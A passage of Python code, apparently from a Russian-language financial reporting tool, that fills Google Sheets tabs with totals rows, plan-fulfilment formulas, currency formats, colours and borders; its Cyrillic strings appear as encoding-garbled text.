f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 1...')
self.sheet2_line = 1
for line_table in self.spreadsheet['sheets'][2]['data'][0]['rowData']:
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
break
else:
self.sheet2_line += 1
except KeyError:
self.sheet2_line += 1
for i, line_table in enumerate(self.spreadsheet['sheets'][0]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(f"A{height_table}:AR{height_table}",
[[f'ะะขะะะ',
"",
f"=SUM(C3:C{height_table - 1})",
f"=SUM(D3:D{height_table - 1})",
f"=SUM(E3:E{height_table - 1})",
f"=SUM(F3:F{height_table - 1})",
f"=SUM(G3:G{height_table - 1})",
f"=SUM(H3:H{height_table - 1})",
f"=SUM(I3:I{height_table - 1})",
f"=SUM(J3:J{height_table - 1})",
f"=IFERROR(ROUND(J{height_table}/I{height_table};2);0)",
f"=SUM(L3:L{height_table - 1})",
f"=SUM(M3:M{height_table - 1})",
f"=SUM(N3:N{height_table - 1})",
f"=SUM(O3:O{height_table - 1})",
f"=IFERROR(ROUND(O{height_table}/N{height_table};2);0)",
f"=SUM(Q3:Q{height_table - 1})",
f"=SUM(R3:R{height_table - 1})",
f"=IFERROR(ROUND(R{height_table}/Q{height_table};2);0)",
f"=SUM(T3:T{height_table - 1})",
f"=SUM(U3:U{height_table - 1})",
f"=IFERROR(ROUND(U{height_table}/T{height_table};2);0)",
f"=SUM(W3:W{height_table - 1})",
f"=SUM(X3:X{height_table - 1})",
f"=IFERROR(ROUND(X{height_table}/W{height_table};2);0)",
f"=SUM(Z3:Z{height_table - 1})",
f"=SUM(AA3:AA{height_table - 1})",
f"=IFERROR(ROUND(AA{height_table}/Z{height_table};2);0)",
f"=SUM(AC3:AC{height_table - 1})",
f"=SUM(AD3:AD{height_table - 1})",
f"=IFERROR(ROUND(AD{height_table}/AC{height_table};2);0)",
f"=SUM(AF3:AF{height_table - 1})",
f"=SUM(AG3:AG{height_table - 1})",
f"=IFERROR(ROUND(AG{height_table}/AF{height_table};2);0)",
f"=SUM(AI3:AI{height_table - 1})",
f"=SUM(AJ3:AJ{height_table - 1})",
f"=IFERROR(ROUND(AJ{height_table}/AI{height_table};2);0)",
f"=SUM(AL3:AL{height_table - 1})",
f"=SUM(AM3:AM{height_table - 1})",
f"=SUM(AN3:AN{height_table - 1})",
f"=SUM(AO3:AO{height_table - 1})",
f"=IFERROR(ROUND(AO{height_table}/AN{height_table};2);0)",
f"=SUM(AQ3:AQ{height_table - 1})",
f"=SUM(AR3:AR{height_table - 1})",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 1}:D{height_table + 1}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ััะฐัะธะบ)',
"",
f"=IFERROR('ะะปะฐะฝ'!C{self.sheet2_line};0)",
f"=IFERROR(ROUND(D{height_table}/C{height_table+1};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 2}:D{height_table + 2}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ะดะพั
ะพะด)',
"",
f"=IFERROR('ะะปะฐะฝ'!E{self.sheet2_line};0)",
f"=IFERROR(ROUND(G{height_table}/C{height_table+2};2);0)",
]],
"ROWS")
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:AR{height_table}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 1}:D{height_table + 1}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table+2}:D{height_table+2}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:AR{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table+1}:D{height_table+1}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table+2}:D{height_table+2}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 2...')
sheetId = 1
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = self.start_line
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%d.%m.%Y'),
len(self.report_rk),
float(sum([line['paid_sum'] for line in self.report_rk]))
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}}
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
# ะััะธัะปะตะฝะธะต ะฟะพัะปะตะดะฝะตะน ัััะพะบะธ ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 2...')
for i, line_table in enumerate(self.spreadsheet['sheets'][1]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(
f"A{height_table}:C{height_table}",
[[f'ะะขะะะ',
f"=SUM(B3:B{height_table - 1})",
f"=SUM(C3:C{height_table - 1})"
]],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:C{height_table}",
[
[
{'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:C{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
if self.itog_report_month:
# SHEET 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 4...')
sheetId = 3
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f'ะัะพะณะพะฒัะน ะพััะตั', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 18}})
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f"ะะฐ {self.data_report} {datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y')}",
'', '', ]], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False}})
self.nex_line += 2
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['ะะฐะทะฒะฐะฝะธะต', 'ะะพะปะธัะตััะฒะพ', 'ะกัะผะผะฐ']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 14}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
for group in self.finreport_dict_month:
if group == 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ':
continue
if group == 'ะะฐัะฐ':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
group,
self.finreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][1],
self.finreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True, 'fontSize': 12}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT', 'numberFormat': {}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT', 'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for folder in self.finreport_dict_month[group]:
if folder == 'ะัะพะณะพ ะฟะพ ะณััะฟะฟะต':
continue
if folder == '':
continue
self.nex_line += 1
if folder is None:
folder_name = 'ะะตะท ะณััะฟะฟะธัะพะฒะบะธ'
else:
folder_name = folder
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
folder_name,
self.finreport_dict_month[group][folder][0][1],
self.finreport_dict_month[group][folder][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for servise in self.finreport_dict_month[group][folder]:
if servise[0] == 'ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
servise[0],
servise[1],
servise[2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': False}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
while self.nex_line < self.sheet4_height:
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False, 'fontSize': 10}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#ffffff")},
fields="userEnteredFormat.backgroundColor")
